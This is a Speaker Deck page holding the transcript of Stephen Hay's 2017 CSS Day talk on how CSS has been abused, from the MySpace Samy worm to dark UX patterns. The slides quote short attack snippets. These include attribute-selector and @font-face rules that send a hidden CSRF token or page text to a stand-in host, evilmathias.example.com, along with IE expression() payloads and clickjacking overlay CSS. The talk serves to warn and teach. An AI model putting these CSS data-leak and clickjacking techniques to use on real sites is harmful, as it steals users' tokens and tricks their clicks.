CSS For Good, Not Evil

June 16, 2017

Design

1.8k

CSS For Good, Not Evil

My talk on CSS security issues and a bit on dark UX, at CSS Day 2017 in Amsterdam

Stephen Hay

June 16, 2017

Tweet

More Decks by Stephen Hay

See All by Stephen Hay

The Virtues of Low-fi

1

180

The Tail and Its Dog

1

310

From Deception to Clarity

4

660

4

920

Power Tools for Browser-Based Design (Artifact 2014)

6

520

The Zero Interface: Using Zero-based Thinking to Maintain Simplicity (FOWD London 2014)

2

560

Flexbox: One Giant Leap for Web Layout

6

410

The New Photoshop, Part 2: The Revenge of the Web (FEC13)

9

940

Flexbox: One Giant Leap for Web Layout

5

180

Other Decks in Design

See All in Design

商業デザインのアクセシビリティにおける倫理フレームワークの考察

1

620

誰もがAIエージェントを"操作"したがる〜AIエージェントに求められるUX〜

2

1.8k

Flow, Not Stock 知識触媒としてのIA

1

300

Marpで推しCSSスライドを作ろう！ / marp-with-favorite-css

0

350

オルタナUX | AIで高速化するのもいいけど品質も大事なんじゃない？というお話

5

1.4k

AI時代に淘汰されないデザインのしごと

1

150

BPStudy#213〜ビジネスアナリシスとDDD（ドメイン駆動設計）パネルディスカッション資料 / BPStudy213-panel

0

440

生成AIを活用した組み込みSW設計書検索システム開発

7

1.2k

株式会社バクタム　会社説明資料

0

260

UXとUIの違いを自分の言葉で表現する： UX DAYS TOKYO

0

180

タイミーでフィールドワークしたら、サービスデザインが始まった

1

2.2k

文字コントラストを改めて考える / Reevaluating Text Contrast

0

280

Featured

See All Featured

Easily Structure & Communicate Ideas using Wireframe

194

16k

Refactoring Trust on Your Teams (GOTO; Chicago 2020)

34

3.1k

Unsuck your backbone

671

58k

Build The Right Thing And Hit Your Dates

37

2.8k

Statistics for Hackers

799

220k

How To Stay Up To Date on Web Technology

790

250k

ピンチをチャンスに：未来をつくるプロダクトロードマップ #pmconf2020

126

53k

Embracing the Ebb and Flow

86

4.8k

YesSQL, Process and Tooling at Scale

173

14k

We Have a Design System, Now What?

53

7.7k

10 Git Anti Patterns You Should be Aware of

656

60k

Building Better People: How to give real-time feedback that sticks.

367

19k

Transcript

CSS For Evil, Not Good. How style has been used
to manipulate people, invade their privacy, steal their data, and other assorted nasty things. Stephen Hay, CSS Day 2017, Amsterdam
None
None
catawiki.com/jobs
MySpace
None
None
None
Samy
In a relationship.
In a relationship. hot
None
but most of all, Samy is   my hero By
vissago / Dan Tentler - http://www.ﬂickr.com/photos/vissago/4861025347/, CC BY 2.0, https://commons.wikimedia.org/w/index.php?curid=26085303
<div id=mycode style="BACKGROUND: url('javascript:eval(document.all.mycode.expr)')" expr="var B=String.fromCharCode(34); …” </div> https://samy.pl/popular/tech.html http://www.securiteam.com/securitynews/6I00C2KEAA.html
WTF https://motherboard.vice.com/en_us/article/the-myspace-worm-that-changed-the-internet-forever
Samy didn’t have   evil intentions.
I’m not a security expert.
None
There are diﬀerent levels of evil.
Level 1: Getting some   browsing history.
weirdbutdead.com
weirdbutdead.com getComputedStyle
Boolean algebra & mix-blend-mode
http://lcamtuf.coredump.cx/whack/ http://lcamtuf.coredump.cx/css_calc/
Level 2 Mathias Bynens’ Evil Basement of Horrors
Some Belgian kid   did a presentation… https://speakerdeck.com/mathiasbynens/3-dot-14-things-i-didnt-know-about-css-at-cssconf-dot-asia-2015
Stealing DOM data
<input type="hidden" name="csrf-token" id="csrf" value=“555…"> #csrf[value^="a"] { background: url(//evilmathias.example.com/?v=a); }
#csrf[value^="b"] { background: url(//evilmathias.example.com/?v=b); } etc.
Text-symbol leaking
<div id=“my-dirtiest-secrets"> I think Javascript is OK </div> @font-face {
font-family: evilmathias; src: url(//evilmathias.example.com/?v=A); unicode-range: U+0041; } #my-dirtiest-secrets { font-family: evilmathias; }
Forcing IE=7 Expressions
.foo { width: expression( alert(‘Bad Evil Mathias’) ); } <meta
http-equiv="X-UA-Compatible" content="IE=7"> <iframe src=“https://target.example.com/page- with-css-payload”></iframe>
Level 3 Path-relative   stylesheet import http://blog.portswigger.net/2015/02/prssi.html
http://example.com/posts.php <link href="styles.css" rel="stylesheet" type="text/css" /> Blah blah blah *
{ width: expression( alert( ‘evil’ )) } http://example.com/posts.php/
Level 4 Content replacement
<style> nav {display: none;} </style> <div style”[various styles]”> Content </div>
Oops: allow users to add <style>
Allow users to add classes. Oops.
Allow users to add classes. Oops.
Level 5 UI Redressing “Clickjacking”
LinkedIn
.li_style { position: absolute; width: 100%; z-index: 10021; position: fixed;
top: 0; left: 0; width: 100%; height: 100%; padding: 0; overflow-y: scroll; _overflow-y: hidden }
{"content": "<p><a class=\"li_style\" href=\"http://www.example.com\">Example Site</a><img src=\"image.png\"/></p>"} - https://security.linkedin.com/blog-archive#11232015
None
Level 6 Phishing
https://www.askdavetaylor.com/beware-the-latest-apple-id-phishing-attack/
None
None
One thing going for us, at least for now: most
scammers aren’t great designers.
“Good” design works. Even for evil.
Level 7 Dark Patterns Black Hat UX
Sophisticated deceivers seem knowledgable about behaviour as well as technology.
None
Image: https://www.brignull.com/
None
None
“Roach Motel”
Unsubscribe…
None
None
None
Misdirection
None
None
None
None
Conﬁrmation of   desired behaviour
Yes | No Yes | Not right now Yes |
Maybe later There is a signiﬁcant diﬀerence between these sets of choices.
Exploiting   behavioural patterns
None
People who stand to gain something from you have motive
to deceive.
Level 8 Command execution   on a target system https://lifepluslinux.blogspot.nl/2017/01/look-before-you-paste-from-website-to.html
None
None
When systems become more complex, the number of possible weaknesses
can increase, yet become less apparent.
What’s the  takeaway here? Nothing.
Is there a   positive message? No.
Thank you! @stephenhay Special thanks to Mathias “Evil Belgian Kid”
Bynens